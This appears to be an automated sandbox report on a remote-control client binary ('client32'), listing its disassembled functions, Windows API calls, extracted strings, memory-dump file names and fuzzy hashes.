                                                                                                                                                    • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                                                                    • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                                                                    • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                                                                    Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1115F275
                                                                                                                                                    • wsprintfA.USER32 ref: 1115F288
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                    • API String ID: 1734919802-1728070458
                                                                                                                                                    • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                                                    • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                                                                    • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                                                    • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                                                                    Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                                                    • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                    • API String ID: 1976012330-1024648535
                                                                                                                                                    • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                                                                                    • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                                                                    • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                                                                                    • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                                                    Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,1EF76653,00000000,?,00000000), ref: 110613A4
                                                                                                                                                    • _malloc.LIBCMT ref: 110613EB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1EF76653,00000000), ref: 1106142B
                                                                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                                                                                    • _free.LIBCMT ref: 110614A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                                    • API String ID: 999355418-161875503
                                                                                                                                                    • Opcode ID: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                                                                                    • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                                                    • Opcode Fuzzy Hash: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                                                                                    • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                                                    Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1EF76653,00000000,?), ref: 1115C927
                                                                                                                                                    • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                                                    • wsprintfW.USER32 ref: 1115C967
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                                                    • wsprintfW.USER32 ref: 1115CA27
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                                    • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                                    • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                                                    • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                                    • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                                                    Function 6CAA0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6CAA0F2B,1737DA36,00000000,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?,00000080), ref: 6CAA0D48
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6CAA0D5B
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6CACCB4C,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?,00000080), ref: 6CAA0D76
                                                                                                                                                    • _malloc.LIBCMT ref: 6CAA0D8C
                                                                                                                                                      • Part of subcall function 6CAA1B69: __FF_MSGBANNER.LIBCMT ref: 6CAA1B82
                                                                                                                                                      • Part of subcall function 6CAA1B69: __NMSG_WRITE.LIBCMT ref: 6CAA1B89
                                                                                                                                                      • Part of subcall function 6CAA1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CAAD3C1,6CAA6E81,00000001,6CAA6E81,?,6CAAF447,00000018,6CAC7738,0000000C,6CAAF4D7), ref: 6CAA1BAE
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?), ref: 6CAA0D9F
                                                                                                                                                    • _free.LIBCMT ref: 6CAA0D84
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CAA0DAF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                                    • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                    • API String ID: 1360380336-1843585929
                                                                                                                                                    • Opcode ID: b36a3f4dcca6a5a143f588c3089dc2a1ddc9e09759dcddf92965fb1c9ad7cae5
                                                                                                                                                    • Instruction ID: bcf8941c0a07c152159f4a514b04957f2fdef4b93a7ceadedb6276061d6a0713
                                                                                                                                                    • Opcode Fuzzy Hash: b36a3f4dcca6a5a143f588c3089dc2a1ddc9e09759dcddf92965fb1c9ad7cae5
                                                                                                                                                    • Instruction Fuzzy Hash: 5701ACB62013416FF63457B09C45F6777A8AF41704F14491CF596DFA80E671F486C764
                                                                                                                                                    Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                                      • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                                    • _memset.LIBCMT ref: 11146055
                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                    • API String ID: 4251163631-545709139
                                                                                                                                                    • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                                    • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                                                    • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                                    • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                                                    Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 1101567A
                                                                                                                                                    • _memset.LIBCMT ref: 110156BE
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                                                    Strings
                                                                                                                                                    • NSLSP, xrefs: 11015708
                                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                                                    • %012d, xrefs: 11015674
                                                                                                                                                    • PackedCatalogItem, xrefs: 110156E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue_memsetwsprintf
                                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                    • API String ID: 1333399081-1346142259
                                                                                                                                                    • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                                    • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                                                    • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                                    • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                                                    Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
